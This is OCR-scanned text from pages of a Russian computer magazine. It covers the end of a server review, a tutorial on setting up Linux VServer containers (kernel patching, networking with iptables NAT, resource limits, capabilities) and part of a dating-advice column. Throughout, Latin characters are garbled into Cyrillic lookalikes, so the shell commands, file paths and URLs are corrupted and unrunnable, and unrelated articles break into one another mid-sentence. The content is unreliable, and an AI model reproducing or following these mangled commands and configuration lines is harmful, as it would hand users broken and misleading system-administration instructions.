тания мощностью 550 Ватт или два блока 
питания на 650 Ватт с режимом коррекции 
питающего напряжения. В качестве опции 
поддерживается подключение привода 
ОѴТ>±КѴѴ и флоппи-дисковода через внут- 
ренний ШВ-интерфейс. Отдельного вни- 
мания заслуживает редкая для российских 



производителей функция интеллектуально- 
го управления системой охлаждения. Она 
включает в себя контроль вращения венти- 
ляторов и автоматическую диагностику не- 
исправного вентилятора (который, кстати, 
легко заменить, не прибегая к каким-либо 
инструментам) . 

Срок гарантии составляет стандартные для 
рынка серверов 3 года с возможностью сер- 
висного обслуживания в любом из более чем 
100 независимых сертифицированных цент- 
ров, расположенных по всей России. 
Официально поддерживаемые операци- 
онные системы: Місгозоіт ѴѴіпсіоѵѵз Зегѵег 
2003/2008. 

Цена: 35000 рублей. 
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ЕВГЕНИЙ ЗОБНИН 

/20ВЫІЫ(В6МАИ.С0М / 

Виртуальные ОСы 

Виртуализация с помощью І_іпих ѴБегѵег 

Хочешьорганизовать публичный доступ ксетевым сервисам, нобеспо- 
коишься за безопасность? Решил переложить часть своих обязанностей 
на другого человека, но не хочешь наделять его правами гооІ?Управля- 
ешьхостингом и желаешь дать своим клиентам настоящую свободу? С 
помощью системы виртуализации Ыпих ѴЗегѵегты легко решишь все эти 
задачи без головной боли и потери производительности. 



Мы не раз говорили о системах виртуализации 
уровня операционной системы (песочницы) 
на примере РгееВЗБ іаіі. Такой тип вирту- 
ализации позволяет разделить одну ОС на 
несколько виртуальных, каждая из которых 
будет обладать собственным окружением 
исполнения (библиотеки, каталоги /сіеѵи / 
ргос, набор стандартных утилит), процессами 
и ІР-адресом. 

В отличие от эмуляции, обеспечиваемой 
такими технологиями, какХеп, ѴМѴѴаге и КѴМ, 
виртуализация уровня операционной системы 
не эмулирует аппаратные составляющие ком- 
пьютера, а создает изолированные контейнеры 
поверх ядра ОС. Это своего рода расширенная 
трактовка понятия «процесс» с более глубоким 
уровнем изоляции и разделения ресурсов, 
предоставляемыхядром. Обладая всего одним 
явным недостатком, заключенным в невозмож- 
ности создания контейнеров для исполнения 
приложений других ОС, песочница наделена 
двумя неоспоримыми преимуществами: 
незначительной потерей производительности 
(в районе 2-3%) и простотой развертывания 
виртуальных окружений. 

Виртуализация особенно популярна среди 
хостинг-провайдеров и создателей сервисов, 
предоставляющих площадки для организации 
облачных вычислений. Ведь в отличие от обыч- 
ного хостинга, который выделяет клиентам 
аккаунт на сервере и доступ к набору предус- 
тановленных служб, хостинг, использующий 
виртуализацию, способен дать пользователям 
безграничный контроль над виртуальным 
сервером, возможностью устанавливать любое 
программное обеспечение и полным отсутст- 
вием ограничений на количество сайтов, 
почтовых ящиков, баз данных, интерпретаторов 
языков программирования. И все это с полной 
изоляцией виртуального сервера от хост-систе- 
мы и простой системой развертывания. 



ПОЧЕМУ ѴБЕ ГСѴЕ К? Сегодня каждая из наибо- 
лее популярных ІЖІХ-систем предоставляет 
возможности для организации виртуализации 
на уровне операционной системы. Во РгееВЗЭ 
уже давно существует технология Эаіі, в Зоіагіз 
изолированные контейнеры называются зона- 
ми (2опе$) , а среди решений для Ыпих наиболь- 
шей популярностью пользуются ОрепѴ2 и Ыпих 
ѴЗегѵег. 

Традиционно ОрепѴ2 (орепѵг.огу) считается 
более взрослой, серьезной и развитой системой, 
этаким выбором профессионалов. Развиваемая 
сообществом Ыпих ѴЗегѵег ГИпих- ѵзегѵег. огу) . 
напротив, отличается простотой реализации 
и непретенциозностью. В то время как ОрепѴ2 
развивается по пути многофункциональной и 
сложной технологии для поддержки и управле- 
ния ѴР5 (Виртуальные Частные Серверы) в боль- 
ших организациях и крупных сервисах, ѴЗегѵег 
следует идеологии простоты и удобства РгееВЗЭ 
Лаіі. Система Ыпих ѴЗегѵег — это проверенный 
годами (более 7 лет разработки) небольшой, 
вылизанный и отлаженный патч для ядра Ыпих; 
он наделяет всем необходимым для организации 
надежной и производительной системы виртуа- 
лизации, единственный недостаток которой — 
невиртуализируемый сетевой стек. 

УСТАНОВКА Программный пакет Ыпих ѴЗегѵег 
состоит из двух частей : патча для Ііпих-ядра и 
набора утилит для управления виртуальными 
серверами. Прекомпилированные ядра с вклю- 
ченным ѴЗегѵег доступны в пакетах для многих 
популярных дистрибутивов, поэтому сначала 
мы рассмотрим вариант установки средствами 
менеджера пакетов в ЦЪітш 9.04, а уже после 
перейдем крупному способу инсталляции, пред- 
полагающему выкачивание исходников ядра с 
кегпеі.ог и компиляцию утилит. 

Итак, операционная система іЛэипШ 9.04, ядро 
2.6.28, ночь, серверная. 



Шаг 1 , Добавляем в арі кеугіп§ ключ для доступа 
к репозиторию ѴЗегѵег: 

$ зисіо арк-кеу асіѵ --гесѵ-кеуз 
--кеузегѵег кеузегѵег .иЪипки. сот 
ВВ9ВРВ5В 

Шаг 2 Добавляем ссылки на репозитории 
ѴЗегѵег в /епс/арі/зоигсез.іізі:: 

сіеЪ Ъ.ккр : / /рра . Іаипскрасі . пек / 
скг і зкорк- Іиказ /рра /иЪипки з аипку 
таіп 

сіеЪ- зге кккр : / /рра . Іаипскрасі . пек / 
скг і зкорк- Іиказ /рра/иЬипки з аипку 
таіп 

Шаг 3 Устанавливаем новое ядро и утилиты: 

$ зисіо арк-дек ирсіаке 
$ зисіо арк-дек іпзкаіі Ііпих-ітаде- 
ѵзегѵег Ііпих-кеасіегз -ѵзегѵег икіі- 
ѵзегѵег 

Та же процедура, с полной пересборкой ядра и 
компиляцией утилит. 

Шаг 1 , Получаем ядро и патч : 

# ссі /изг/зге 

# мдек кккр : / /талам . кегпеі . огд/ 
риЬ/1іпих/кегпе1/ѵ2 . 6/1іпих-2- 
.6.28.7. каг .Ьз2 

# тѵдек Ьккр: //ѵзегѵег . ІЗкМІоог. 
ак/ЕхрегітепкаІ/раксЪ-2 .6.28.7- 
ѵз2.3.0.36.8.сіікк 

Шаг 2. Накладываем патч наядро, копируем 
существующий конфиг и запускаем конфигу- 
ратор: 

# каг -хз к 1іпих-2 .6.28.7. каг . Ьз2 
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ІРТаЫез 



ірІаЫез -I паі -А Р05ТРЮІГПМ6 \ 

-з 192.168.1.1/24 -сі ! 192.168.1 .1/24 \ 
-б ЗМАТ Чо-зоигсе 82.195.23.28 



І_іпих ѴРЗ 

екЮ: аііаз 192.168.1.1 



І_іпих 

Нозі Зузіет 



# сб Ііпих-2 .6.28.7 

# ср /Ъооб/сопбід-Х.Х.Х . 

# рабсЪ. -рі < . . /рабск-2 .6.28. 7-ѵз2 .3.0.36.8. бібб 

# таке теписопбід 

Шаг 3. Изменяем конфигурацию пункта меню Ьіпих ѴЗегѵег: 

ЕпаЫе Ьедасу Кегпеі АРІ — Поддержка устаревшего АРІ пер- 
вой версии патчей. Отключаем 

ЕпаЫе Ѵігбиаіігеб Сиезб Тіше — Возможность установки ин- 
дивидуальной временной зоны для каждого окружения. Акту- 
ально для владельцев хостингов , во всех остальных случаях 
бесполезна и создаст дополнительный оверхед для системных 
вызовов , работающих со временем 

ЕпаЫе Ргос Зесигібу — Скрывать все процессы, не принад- 
лежащие окружению, в каталоге /ргос этого окружения. 
Включаем 

ЕпаЫе Нагб СРб Ьітібз — Жесткое ограничение окружений по 
времени использования процессора. Включаем 
Тад ЫЕЗБ бзег АибЪ. апб Еііез — Поддержка встроенного в ядро 
ЫЕЗ- демона 

Махішшп пшшЬег об Сопбехбз — Максимально возможное число 
окружений 

Шаг 4. Устанавливаем ядро: 

# таке 

# таке тоби1ез_іпзба11 

# ср агск/і386/Ъооб/Ъ2Ітаде /Ъооб/ѵт1іті2-2 . 6 . 28 . 7-ѵз2 . 3 

Шаг 5. Правим конфигурационный файл загрузчика: 

#ѵі/воот/екив/МЕми.і_5т 

ЫЫе Ьіпих 2 . 6.2 8 . 7-ѵз2 . 3 
гооб (Ъ.60,0) 

кегпеі /Ьоок/ѵтІіпиг-2 . 6 . 28 . 7-ѵз2 . 3 гооб=/беѵ/Ьба1 го 

іпібгб /Ъооб/іпібгб. ітд-2 .6.28. 7-ѵз2 . 3 

Ъооб 

Шаг 6. Получаем и устанавливаем набор утилит для управления вирту- 
альными серверами: 

# об /бтр 

# мдеб Ь.ббр : / /ббр . Ііпих-ѵзегѵег . огд/риЪ/ибіІз/ибіІ- 
ѵзегѵег/ибі1-ѵзегѵег-0 . 30 .215 . баг .Ъг2 

# баг х^б ибі1-ѵзегѵег-0.30.215.баг.Ь22 

# об ибі1-ѵзегѵег-0 . 30 .215 

# ./сопбідиге --ргебіх=/изг --зузсопббіг=/ебс 

# таке іпзбаіі 



ПОД ГОТОВ КА К ЗАПУСКУ Перед тем как перейти к запуску виртуальных 
окружений («контекстов» в терминологии Ьіпих ѴЗегѵег), мы должны 
соответствующим образом подготовить операционную систему. Первое, 
что следует сделать — примонтировать файловую систему, на которой 
будут располагаться виртуальные окружения, с опцией Это даст ядру 

возможность устанавливать принадлежность определенных файлов 
конкретному контексту, что, в свою очередь, позволит устанавливать 
дисковые квоты на этот контекст. 

Открываем файл /еПс/ЫаЪ, находим строку, ответственную за монти- 
рование файловой системы, содержащей каталог /ѵаг/НЪ (виртуальные 
окружения по умолчанию хранятся в /ѵаг/НЬ/ѵзегѵегз) , и добавляем к 
опциям ее монтирования флаг Результирующая строка должна выгля- 

деть примерно так: 

/беѵ/збаЗ /ѵаг ехбЗ бад 1 1 

Если каталог находится на файловой системе геізегіз, добавляем также 
опцию ашгз. Отправляем сервер в ребут. 

Теперь необходимо установить так называемый «СЬгооі: Ваггіег», который 
закроет процессы виртуальных сред в указанном каталоге, откуда ни один 
процесс окружения не сможет выбраться: 

# зебаббг --Ьаггіег /ѵаг/ІіЪ/ѵзегѵегз 

В довершение подготовительных действий прописываем в переменную 
ядра кегпеі. ѵзйеірег путь к скрипту, который будет корректно останавли- 
вать виртуальный сервер: 

# есбю "кегпеі .ѵзкеірег = /изг/1іЬ/ибі1-ѵзегѵег/ѵзЬе1рег " 
» /ебс/зузсбі . сопб 

# зузсбі -р 

ЗАПУСК ВИРТУАЛЬНОГО СЕРВЕРА Дтя начала необходимо создать 
минимальное Ыпих-окружение, где будут работать изолированные 
процессы. Сделать это можно с помощью специальных утилит, но 
гораздо легче и быстрее просто скачать готовый образ (шаблон) с 
одного из специальных ресурсов. Мы обратимся к хранилищу Ир:/ /Ир. 
рЫ-Ііпих.ог^/реорІе/Ьаѵѵк/ѵзегѵег-щтрІаііез/. в котором размещены 
готовые образы последних релизов СепЮ5, ЭеЫап, Ребога и ЦЪипш, 
предназначенные для применения в системе ѴЗегѵег. Получим образ 
последнего релиза іЛэипш (ты можешь выбрать любой другой, по 
своему вкусу): 

$ сб /бтр 

$ ѵ^деб ббр://ббр.р1б-1іпих.огд/реор1е/Ьаѵбк/ѵзегѵег- 
бетр1абез/ІіЬипби/заипбу-і3 86 . баг .Ьг2 

С помощью специальной команды создадим из него готовый к работе 
виртуальный сервер: 
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□ ЫІІХѴБЕРѴЕР АВТОМАТИЧЕСКИ НАСТРА- 
ИВАЕТ СЕТЬ ДЛЯ ВИРТУАЛЬНЫХОКРУЖЕ- 
НИЙ 




> іп^о 

• По умолчанию со- 
здание виртуальных 
серверов проис- 
ходит в каталоге / 
ѵаг/ІіЬ/ѵзегѵег. Если 
ты хочешь держать 
серверы в другом 
месте, сделай файл / 
еіс/ѵзегѵег/.сіеіаиііз/ 
ѵсІігЬазе символи- 
ческой ссылкой на 
нужный каталог. 

• С помощью утилиты 
ѵзегѵегты можешь не 
только запускать вир- 
туальные серверы, но 
и удалять их (ѵзегѵег 
сіеіеіе) , выполнять 
команды внутри окру- 
жений (ѵзегѵег ехес], 
удалять и устанавли- 
вать пакеты (ѵзегѵег 
грт, ѵзегѵег а рі-деі]. 




> ѵѵагпіпд 

По умолчанию 

утилиты іор и рз не 
показывают про- 
цессы, работающие 
внутри виртуальных 
окружений. Чтобы 
увидеть их, используй 
ѵрз и ѵіор. 



# ѵзегѵег ѵрзі Ьиіісі \ 

--сопСехС 10 \ 

--ЬозСпате ѵрзі .Іюзі: . ги \ 

--іпДегІасе еНЬО : 192 . 168 . 1 . 1/24 \ 

--іпіСзСуІе ріаіп \ 

-т СетрІаСе -- \ 

— (3. заипСу \ 

-С /Стр/заипСу-і3 8б . Саг .Ът.2 

Приведенная команда развернет образ в каталог /ѵаг/НЬ/ 
ѵзегѵегз/ѵрзі и проведет его начальное конфигурирование. 
Первая строка говорит о том, что новое виртуальное окру- 
жение должно быть создано с именем ѵрз 1, вторая указы- 
вает на номер контекста (он может быть любым) , третья 
устанавливает сетевое имя виртуального сервера в ѵрзі. 
Ьозг.ш, четвертая — привязывает его к сетевому интерфейсу 
егЬО и назначает ІР-адрес 192. 168. 1. 1, в пятой указан способ 
инициализации окружения (ріаіп — запуск /зЬіп/іпіі;). Ос- 
тавшиеся строки говорят о том, что в качестве источника для 
сборки окружения должен быть использован шаблон /Гтр/ 
]аипГу-і386.Гаг.Ъ22, основанный на дистрибутиве ЦЬипш 9.04 
(Лайту Ласкаіоре) . 

ѴЗегѵег поддерживает множество других методов сборки 
окружений, включая полностью автоматизированные (с 
автоматическим выкачиванием дистрибутива), с которыми 
ты можешь ознакомиться, прочитав тап-страницу ѵзегѵег- 
ЪшЫ. 

Теперь запустим вновь созданный виртуальный сервер и 
убедимся в его работоспособности: 

# ѵзегѵег ѵрзі зДагД 

# ѵзегѵег- зДаД 

Сервер должен присутствовать в списке. 

Остановим сервер : 

# ѵзегѵег ѵрзі зДор 

Н АСТРО Й КА Все внешние по отношению к окружению 
настройки виртуальных серверов, такие как ограничения, 
доступные сетевые интерфейсы и т.д., хранятся в каталоге / 
егс/ѵзегѵегз/имя_сервера. Поэтому переходим в каталог / 
егс/зегѵегз/ѵрз 1 и приступаем к шаманству с конфигураци- 
онными файлами. 

Для начала взглянем на каталог іпгегбасез, который уже 
содержит один подкаталог с названием «0». Он хранит 
настройки первого виртуального сетевого интерфейса, 
доступного внутри виртуального окружения. Ііпих ѴЗегѵег, 
как и система РгееВЗБ Лаіі, использует сетевой интерфейс 



хост-системы и закрепленный за ним ІР-псевдоним для пре- 
доставления виртуальным окружениям доступа во внешний 
мир. Для хранения настроек каждого сетевого интерфейса 
используется отдельный каталог с числовым именем (0 — 
первый интерфейс, 1 — второй и т.д.) Поэтому для того чтобы 
оснастить виртуальный сервер дополнительным сетевым 
интерфейсом, необходимо создать каталог с именем «1» и 
поместить в него несколько файлов с настройками: 

/ / Привяжем сетевой интерфейс к устройству еПЬ.1 

хост-системы 

# есію "еЦМ" > сіеѵ 

// Зададим ІР-адрес и маску сети 

# есйо "192.168.1.2" > ір 

# есію "24" > ргеііх 

Обрати внимание, что если ты сейчас запустишь вирту- 
альный сервер и взглянешь на вывод его команды і1сопй§, 
то увидишь, что оба сетевых интерфейса уже полностью 
настроены и готовы к работе. Скрипты и утилиты ѴЗегѵег 
делают всю грязную работу сами, и любой виртуальный 
сервер можно настроить с помощью внешних конфигураци- 
онных файлов. 

Это же утверждение относится и к монтируемым файловым 
системам. Вместо того, чтобы заходить на сервер и редак- 
тировать /еіс/іДаЪ, ты можешь поместить монтируемые 
ФС в файл /еШ/ѵзегѵегѴѵрз 1 /ізіаЪ . По умолчанию он уже 
содержит строки, ответственные за подключение файловых 
систем /сіеѵ, /ргос и /Ппр, к которым можно добавить, напри- 
мер, монтирование дерева портежей хост-системы (если в 
качестве виртуального сервера используется Сепіоо) : 

/изг/рогПаде /изг/рогПаде попе МпсЩгм 0 0 

СЕТЬ Мы присвоили виртуальному окружению «фиктив- 
ный» ІР-адрес из внутреннего диапазона адресов, поэтому 
гостевой сервер не сможет получить доступ к внешней сети, а 
без этого он и не сервер. Есть два распространенных способа 
решения этой проблемы: 

1 . Присвоить виртуальному окружению белый ІР-адрес (нуж- 
но покупать у провайдера) . 

2. Настроить ЫАТ между хост-машиной и виртуальным 
сервером, что позволит перенаправлять исходящий от вир- 
туального сервера трафик на внешний сетевой интерфейс 
хост-системы и пускать нужный входящий трафик прямиком 
на адрес виртуального сервера. 

Рассмотрим второй вариант подробнее. Настроим 5ЫАТ, 
чтобы исходящий от виртуального сервера трафик выходил 
наружу: 
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гооі(Эѵр5І :/# | 

В КАТАЛОГЕ ЛЭЕѴ ВИРТУАЛЬНОГО СЕРВЕРА НЕТ 
НИЧЕГО, ЧТО МОЖНО ИСПОЛЬЗОВАТЬ ДЛЯ ВЫХОДА 
ЗА ПРЕДЕЛЫ ОКРУЖЕНИЯ 

# ірбаЫез -6 пар -А РОЗТКООТШО -з 192.168.1.1/24 \ 

-<5. ! 192.168.1.1/24 -} ЗЫАТ --іо-зоигсе <Внешний ІР> 

И БЫАТ, чтобы предназначенный для определенных сетевых сервисов 
трафик перенаправлялся на ІР-адрес виртуального сервера (пример для 
ѵѵеЬ-сервера, работающего под управлением ѴЗегѵе г) : 

# іріаЫез -В пар |А РКЕШОТШС -з ! 192.168.1.1/24 \ 

-ш іср -р іср --сірогі 80 \ 

-3 БЫАТ --іо-сіезііпаіііоп 192.168.1.1:80 

ОГРАНИЧЕНИЯ РЕСУРСОВ Настройки ограничений ресурсов, наклады- 
ваемых на виртуальный сервер, хранятся в каталогах сШтііз и гіітііз. По 
умолчанию эти каталоги не существуют, поэтому сервер может отъедать 
ресурсы почти на равных с хост-системой. Чтобы исправить ситуацию, со- 
здадим каталог /ещ/ѵзегѵегз/ѵрзі/сііітіііз, который будет хранить настрой- 
ки, накладывающие лимит на использование дискового пространства: 

# сб. /еВс/ѵзегѵегз/ѵрзІ 

# тксііг сПітікз 

Создадим каталог для настроек корня файловой системы виртуального 
сервера (на самом деле имя может быть любым) : 

# тксііг біітікз/гоок 

# сб біітііз/гооі 

Укажем каталог, для которого будут действовать ограничения: 

# есію " /ѵаг/1іЬ/ѵзегѵегз/ѵрз1" > бігесіогу 

Лимит на количество индексных дескрипторов (максимальное количест- 
во файлов): 

# есію "10000" > іпобез_іоіаі 

Максимальное пространство, которое могут занимать файлы этого вирту- 
ального окружения (укажем 10 Гб) : 

# есЬо "10485760" > зрасе_Ьоіа1 

Процент зарезервированного для пользователя гооі: пространства: 

# есію " 5 " > гезегѵесі 

Теперь установим тэг на существующие файлы виртуального сервера, 
чтобы ядро смогло определить их принадлежность ѵрзі и правильно рас- 
считать лимиты (файлы, созданные виртуальным окружением, автомати- 
чески получат этот тэг) : 



# сйхіб -Шх -с ѵрзі /ѵаг/1іЬ/ѵзегѵегз/ѵрз1 

Все, теперь можно запустить виртуальный сервер и выполнить команду 
ѵсШтіі:, которая покажет занятые виртуальным сервером ресурсы ФС и 
лимиты: 

# ѵбіітіі --хісі ѵрзі /ѵаг/1іЬ/ѵзегѵегз/ѵрз1 

От лимитов всегда можно избавиться, просто удалив каталог /егс/ 
ѵзегѵегз/ѵрз 1 /бНтіГз/гооі: и выполнив команду ѵбіітіі: с флагом '-гетоѵе', 
которая отменит их для запущенного сервера: 

# ѵбіітіі — хісі ѵрзі --гетоѵе /ѵаг/ІіЬ/ѵзегѵегз/ѵрзІ 

Для хранения настроек лимитов на виртуальную память и процес- 
сорное время предусмотрен каталог /еГс/ѵзегѵег5/имя_контекста/ 
гіітііз. Ілпих ѴЗегѵег использует системный вызов зеіт1ітіі:(2) для 
накладывания лимитов на ресурсы контекста. Всего существует 22 
различных вида ресурсов (15 в ванильном ядре + 7, добавляемые 
Ьіпих ѴЗегѵег), наиболее интересные из них перечислены ниже (стра- 
ница = 4 Кб для х86) : 

сри — Процессорное время, выделяемое контексту, в милли- 
секундах 

ізіге — Размер файла в килобайтах 

гзз — Размер резидентной памяти в страницах 

пргос — Количество процессов 

аз — Размер адресного пространства контекста в страницах 
пісе — Приоритет, который может получить процесс контекста 
пзоск — Число открытых сокетов 
орепіб — Число открытых файловых дескрипторов 

Чтобы установить максимальное значение для каждого из этих ресурсов, 
достаточно записать число в одноименный файл внутри каталога /еіс/ 
Ѵ5егѵег5/имя_сервера/г1ітіщ. Например, ограничим адресное пространс- 
тво контекста значением 100 Мб (25600*4 Кб) : 

# тксііг /екс/ѵзегѵегз/ѵрзі/гіітікз 

# есію "25600" > /екс/ѵзегѵегз/ѵрзі/гіітікз/аз 

Кроме того, в Ыпих ѴЗегѵег встроена гибкая система ограничения контек- 
стов в правах и полномочиях, возможности которой можно использовать 
для наделения контекста особыми привилегиями или, наоборот, лишения 
прав. Все, что позволено контексту, должно быть перечислено в файле / 
еГс/ѵзегѵег5/имя_контекста/ссараЪі1іі:іе5. Вот возможные флаги этого 
файла: 

ЗЕТ_ІІТЗЫАМЕ — Возможность использовать системные вызовы 
зеіботаіппате (2 ) и зебПозбпате (2 ) для установки имени хоста 
8ЕТ_К.ЫМІТ — Право использовать зебгіітіб (2) для управле- 
ния лимитами 

КАѴ/_ІСМР — Право использовать "сырые" сокеты 
ЗУЗЬОС — Использование зуз1од(2) для ведения журналов 
ЗЕСШЕ_МОШТ — Разрешить тоипі ( 2 ) 

ЗЕСШЕ_КЕМОШТ — Разрешить перемонтирование 
ВШАПУ_МОШТ — Бинарное /сетевое монтирование 
01ЮТА_СТЬ — Разрешить накладывать квоты 
АБМШ_МАРРЕК — Разрешить доступ к "сіеѵісе таррег" 
АБМШ_СЕООР — Доступ к Іоор-устройству 
КТНКЕАБ — Возможность создавать потоки ядра 

Существует и множество других флагов, которые следует указывать 
в файлах Па§5, пЛа^з, ЬсараЫНйез и псарз. Детальное их описание 
можно найти на страничке Ііпих-ѵзегѵег.ог^/ітІ-ѵзегѵепСараЪіІііііез 
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ДАМСКИМ УГОДНИКЪ 



ПСИХОЛОГИЯ ОБЩЕНИЯ С ПРЕКРАСНЫМ ПОЛОМ 



ЛЕТО ПОДХОДИТ К КОНЦУ, А ЭТО ЗНАЧИТ, ЧТО ПРИШЛА ПОРА ДОЛОЖИТЫЕБЕ РЕ- 
ЗУЛЬТАТЫ СЕКРЕТНОГО Р5ѴСН0-ЭКСПЕРИМЕНТА, КОТОРЫЙ МЫ РЕШИЛИ ЗАМУТИТЬ, 
ПАМЯТУЯ О ТОМ, ЧТО НАШ ЖУРНАЛ С ДРЕВНИХ ВРЕМЕН ОТЛИЧАЛСЯ НЕ ТОЛЬКО 
КОНТРКУЛЬТУРНО-ХАКЕРСКИМИ СТАТЬЯМИ, НО И НЕКИСЛЫМ, ПРЯМО СКАЖЕМ, ЛАЙФ- 
СТАЙЛОМ. 



АЛЬФА И ОМЕГА 

Сомнительная наука «этология» в 
процессе изучения поведения кур, 
собак и прочих представителей 
животного мира, путем последую- 
щего переноса наработанного 
материала на людей, давно позна- 
комила нас с классическими кри- 
териями альфа-самца. Дескать, 
желаешь пользоваться успехом у 
женщин — будьальфой, отнимай 
комбикорм и свекловичный жмых 
у бета-самца, заставляй его при- 
нимать позу покорности, отращи- 
вай самое яркое в стае оперение и 
всегда первым занимай место на 
токовище. Некоторое рациональ- 
ное зерно в этих рассуждениях 
имеется, но все же меня почему-то 
напрягаетвсе это теоретизирова- 
ние с использованием фраз вроде 
«самка подсознательно выбирает 
самца, наиболее выгодного с 
точки зрения продолжения рода». 
Поэтому я предлагаю временно 
пуститьлесом подсознание, на- 
циональное сознание и истори- 
ческую память, доставшуюся нам 
от человекообразных предков, и 
рассмотреть, какими чертами ха- 
рактера обладает альфа-человек. 
Не голая обезьяна, а Ьото заріепз. 
• Уверенность и самооценка . 
Ключевое качество плейбоя 
— самооценка — определяет 
уверенность в себе и своих силах, 
показывая, насколько высоко он 
позиционирует себя по сравнению 
с окружающими. Начиная какое-то 
дело, настраивается ли он на успех 
или волнуется по поводу отказа 
или неудачи? Сбиваютли его 
неудачи столку или только делают 
настойчивее? Насколько он уверен 



в правильности своих действий? 
Часто ли он рефлексирует, попусту 
перепроверяетсвои свершения 
или, может быть, избыточнотрево- 
жится по поводу их результата? Все 
эти пунктики в большой степени 
зависят отуровня самооценки. Са- 
мооценка — понятие внутреннее и 
прямому сознательному контролю 
недоступна. Она формируется в 
первые годы жизни (где-то до 8-1 0 
лет] и струдом меняется впо- 
следствии. Чтение книг, статей 
и занятия аутотренингом чаще 
всего заканчиваются обломом. Это 
вообще логично для любых сфер 
деятельности — одним чтением 
никто даже правильной обработке 
детали номердевятьс помощью 
драчевого напильника до сих пор 
не обучился. Что ужтут говорить о 
собственной психологии? 

• Умение принимать решения 
и нести за это ответственность . 
«Принятие решений» в данном 
случае — вовсе не разрешение 
глобальных проблем вроде 
покупки машины или контроль- 
ного пакета акций, а вполне себе 
повседневная мысль — в какой 
бар/ресторан заглянуть, какое 
кино смотреть и в какой парк 
двигаться. На практике оказы- 
вается, что с этим, казалось бы, 
простым пунктом у нашего брата- 
компьютерщика бывает плохо. 
Людям увлекающимся, вообще, 
свойственно пускать побоку вещи, 
на их взгляд малозначимые. Со 
временем это приводит кзаметной 
нерешительности в плане сфер, • 
отличных от ІТ-технологий. Вялые 
ответы в духе «да мне все равно, 
кино — оно все одинаковое, как 



тебе нравится» ощутимо отдаляют 
нашего пациента от вожделенного 
социального статуса. 

• Умение идти на конфликт . Под 
конфликтом понимается вовсе не 
рукоприкладство, а конфронтация 
(и психологическая устойчивость 
кней] в более широком смысле. 
Микроконфликты с нами происхо- 
дят постоянно. Кто-то пропускает 
все мимоушей, кто-то — предпо- 
читает «быть выше этого», кто-то 

— тихо терпит. Иные люди ведут 
себя более агрессивно, отстаивая 
свое личное пространство и точку 
зрения. 

• Умение говорить «Да» и умение 
говорить «Нет» . «Да , я ч ита ю 

«Незнайку на луне», и мне это нра- 
вится» вместо «Ну, случайно взял, 
соседка подсунула». «Да, я смотрю 
«Поле Чудес» каждую пятницу» 
вместо«ой-ой, случайно включил, 
вообще-то, я телевизором, того, 
не увлекаюсь». «Нет, я не пойду в 
кино, поскольку мне туда сегодня не 
хочется» вместо «тут дела, обещал 
Темычу с машиной помочь, ты уж из- 
вини, не могу, а та к я бы с удовольст- 
вием». Почувствовал разницу? 

• Извините, пожалуйста, но этот 
пункт — последний . Не стоит из- 
виняться, другмой. Посмотри на 
своих коллег по работе или учебе. 
Что ты видишь? Почему получается 
так, что человек, который допустил 
косяк по службе и искренне раскаи- 
вается по этому поводу, в итоге под- 
вергается большему прессингу со 
стороны начальства? Я имею в виду 

— по сравнению с неким условно- 
бесстыжим персонажем, который 
на три часа опоздал и в упор не 
видит, в чем здесь проблема, и 



угрызений совести не испытывает. 
Все потому, что окружающим всег- 
да проще осуждать и прессоватьтех 
людей, которые сами себя внутрен- 
не прессуют. В общении с противо- 
положным полом действу ют те же 
принципы, но не перегибай палку. 
Извиниться за то, что ты опоздал 
на свидание все-таки стоит. По 
крайней мере, барышня.поймет, что 
тебе не все равно, что она по этому 
по воду думает. 

ОБЩЕНИЕ 

С личностно-моральным обликом 
подопытного плейбоя мы разобра- 
лись. Самое время обсудить про- 
стой процесс общения. Простой? 
Именно! Почему-то представители 
гламурной прессы, фокусируясь на 
частностях, забываюто главном 
— направляясь на встречуссимпа- 
тичной девушкой, ты идешьтудаза 
общением. А общение не подраз- 
умевает камлания с бубном, вроде 
«не забыть два раза вторгнуться в 
личное пространство не менее чем 
на 25 см, один раз коснуться за- 
пястья, один раз потрогать сережку, 
три раза приобнять...», а подразу- 
мевает простое, ведущее к взаим- 
но му удовольствию, общение. Будь 
позитивен, не читай мантры, не 
бойся облома, просто получай кайф 
от встречи, от разговора, от, таки да, 
физического контакта. Иначе гово- 
ря, ставить перед собой отдален- 
ные цели и постоянно вспоминать, 
что в какой-то психологической 
статье советуют на первом-третьем 
свидании обязательно сделатьто- 
то и то-то, иначе это не свидание, 
а срам сплошной — недело. Сам 
понимаешь, что бормочущий, по- 
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ДЕИЛ КАРНЕГИ ВЕСЬМА ПЛОДОВИТ. В ЕГО 
КНИГАХ СОДЕРЖАТСЯ РЕЦЕПТЫ НА ВСЕ 
СЛУЧАИ ЖИЗНИ. НИЧТО НЕ МЕШАЕТ ОЗНА- 
КОМИТЬСЯ СО «СТАНДАРТНЫМИ ДРАЙ- 
ВЕРАМИ» ОТ КАРНЕГИ, НО И СВОИМ УМОМ 
ПОЛЬЗОВАТЬСЯ НЕ ЗАБЫВАЙ 



груженный в свои мысли парень, 
ни к селу, ни к городу изрыгающий 
психологические штампы, вы- 
глядит подозрительно не только в 
глазах девушек. 

ПРАКТИКА 

Довольно трудно давать кон- 
кретные советы по стратегии и 
тактике организации случайных 
(и закономерных!) половых кон- 
тактов. Классики жанра советуют 
за словом в карман не лезть, на 
комплименты не скупиться и к 
брутальной настойчивости не 
склоняться. Может быть, но, по 
слухам, практика Арнольда Швар- 
ценеггера этого не подтверждает 
— он соблазнял женщин практиче- 
ски без слов и очень быстро, никак 
неафишируя перед американками 
свой австрийский акцент. До тех 
пор, пока все люди не превратятся 
в клонов (а какзнать, до чего до- 
ведут социальные сети, ионизи- 
рующая радиация и генетически- 
модифицированные свиньи?), к 
каждому человеку подход нужен 
индивидуальный. Поэтому «стан- 
дартных» алгоритмов мы приво- 
дить не будем, а общие принципы 
сформулируем воттак: 

• Не бойся показать, что девушка 
понравилась . В этом нет реши- 
тельно ничего стыдного. 

• Уверенность в себе, настрой на 
общение, отношение к неудачам 

как к полезному научающему 
опыту . Важно не бояться получить 
отказ, — неудачи должны повышать 
волю и мотивацию, а не снижать ее. 



• Нормально пахнуть, прилич- 
но выглядеть, обращаться к 
девушке на «Вы», держать спину 
прямо и иметь в кармане неис- 
пользованный презерватив . 

Пусть это и не чистая психология, 
но все эти вещи очень важны, и 
если я не включу этот пункт, Ирина 
Геннадьевна подвергнет меня 
электросудорожной терапии и 
медикаментозному связыванию. 
Заботу об эстетическом восприя- 
тии женщин она ставит на первое 
место в процессе реализации 
нашей сегодняшнёй задачи, по- 
скольку нюху них тоньше, а время 
на принятие решения... меньше 
минуты! Да, я сказал «меньше 
минуты»! Считается, что решение о 
